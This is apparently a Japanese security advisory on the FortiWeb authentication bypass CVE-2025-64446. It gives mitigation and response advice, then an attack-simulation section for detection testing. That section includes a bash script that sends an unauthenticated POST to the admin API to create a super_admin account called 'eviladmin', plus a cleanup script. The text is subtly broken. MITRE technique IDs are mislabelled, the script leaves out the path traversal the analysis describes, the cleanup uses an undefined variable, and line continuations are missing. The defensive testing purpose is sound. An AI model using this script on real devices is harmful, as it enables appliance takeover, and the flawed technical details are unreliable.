Fortinet FortiWebの認証バイパス (パストラバーサル脆弱性) (CVE-2025-64446)

概要

Fortinet FortiWebにおける新たに開示された重大な認証バイパスの脆弱性、CVE-2025-64446として追跡されているものは、未認証の攻撃者がクラフトされたパストラバーサルリクエストを通じて管理者アカウントを作成できるようにします。公開されている報告によると、この脆弱性は2025年10月初旬から積極的に悪用されており、その深刻さから公式な脅威カタログに後に追加されました。悪用が成功すると、影響を受けたWAFアプライアンスの完全な制御を得ることができ、脅威アクターが内部ネットワークに深く浸透することを可能にするかもしれません。初期のCVE-2025-64446の調査は、悪用の試みがスケールでインターネットに露出しているFortiWebデバイスを引き続きターゲットにしていることを示しています。

CVE-2025-64446 分析

CVE-2025-64446は複数のFortiWebバージョンに影響を与え、攻撃者がAPIエンドポイントに向けたクラフトされた悪意のあるHTTP POSTリクエストを送信することを可能にします。ディレクトリトラバーサルシーケンスにより、ユーザー作成を担当する管理CGIスクリプトにアクセスすることができます。これにより、デバイス上に新たな管理者アカウントが作成され、完全な対抗者の制御が可能となります。FortiWebデバイスは他のFortinet製品と密接に連携して運用されているため、この脆弱性はエコシステム全体への露出を拡大し、攻撃が成功すると、より多くの接続されたシステムやサービスが横方向に侵害される可能性があります。以前のFortiWebへの攻撃（CVE-2025-25257に関する活動を含む）は、引き続きターゲットにされる可能性を強化しています。

緩和策

Fortinetは影響を受けるすべてのバージョンのパッチをリリースしました。CVE-2025-64446の即時緩和には最新の修正済みリリース製品バージョン8.0.2へのアップグレードが必要です。推奨される緩和策には、管理インターフェイスアクセスを信頼されたIPアドレスまたはVPNに制限すること、管理者アクセスに対してMFAを強制すること、すべてのFortiWeb管理者アカウントの資格情報を更新すること、異常なユーザー作成イベントを監視するために管理APIアクティビティを監視すること、およびインターネットからのHTTP/HTTPS管理の公開露出を削除することが含まれます。組織はまた、運用上の混乱を避けるために内部のパッチテスティング手順に従うべきです。

対応

セキュリティチームはバージョンインベントリを確認し、遅延なくパッチを適用し、即時のアップグレードが不可能な場合には外部管理アクセスを無効化するべきです。積極的な悪用の試みがあるため、脆弱なAPIパスをターゲットとする疑わしいPOSTリクエストに対する監視を強化することが賢明です。既存のアカウントに予期しない変更が見られる場合、資格情報を更新し、監査ログを頻繁にレビューするべきです。CVE-2025-64446のIOCを収集し、トラフィックパターンをレビューし、最近の悪用活動と関連付けることは、可視性を向上させ、リスクを低減します。

シミュレーション実行

前提条件: テレメトリおよびベースラインのフライトチェックが合格している必要があります。

根拠: このセクションは、検出ルールを発動させるために設計された対抗者の手法 (TTP) の正確な実行を詳細に説明します。コマンドとナラティブは、特定されたTTPを直接反映し、検出ロジックによって予期される正確なテレメトリを生成することを目的とする必要があります。

• 攻撃ナラティブ＆コマンド:

  1. 調査 (T1016.001): 攻撃者はオープンソースインテリジェンスを通じてFortiWebアプライアンスの公開IPを発見します。
  2. 資格情報の収集 / 特権昇格 (T1567.004): 発見されたCVE-2025-64446を使用して、攻撃者は完全な特権を持つ新しい管理者ユーザーを作成するための悪意のあるPOSTペイロードを生成します。
  3. 実行: 攻撃者はHTTPSで生成したリクエストを送信し、request_method はPOST であり、request_uri は正確に/api/v2.0/cmdb/system/admin.

• リグレッションテストスクリプト:

  #!/usr/bin/env bash
  # CVE-2025-64446を悪用して新しいFortiWeb管理アカウントを作成します
  # ターゲット環境に合わせて変数を調整してください
  
  TARGET="https://fortiweb.example.com"
  ENDPOINT="/api/v2.0/cmdb/system/admin"
  NEW_USER="eviladmin"
  NEW_PASS="P@ssw0rd!2025"
  # 脆弱なAPIは、このエンドポイントの認証を必要としません（CVEによると）
  PAYLOAD=$(cat <<EOF
  {
      "name": "${NEW_USER}",
      "password": "${NEW_PASS}",
      "privilege": "super_admin"
  }
  EOF
  )
  
  echo "[*] ${TARGET}${ENDPOINT}に悪意のあるPOSTを送信しています"
  curl -k -X POST "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/json" 
       -d "${PAYLOAD}" 
       -o /dev/null -s -w "HTTP %{http_code}n"
  
  echo "[*] 攻撃シミュレーション完了。"

• クリーンアップコマンド:

  #!/usr/bin/env bash
  # テスト中に作成された悪意のある管理アカウントを削除します
  TARGET="https://fortiweb.example.com"
  ENDPOINT="/api/v2.0/cmdb/system/admin/${NEW_USER}"
  
  echo "[*] テスト管理アカウント${NEW_USER}を削除しています"
  curl -k -X DELETE "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/json" 
       -o /dev/null -s -w "HTTP %{http_code}n"
  
  echo "[*] クリーンアップ完了。"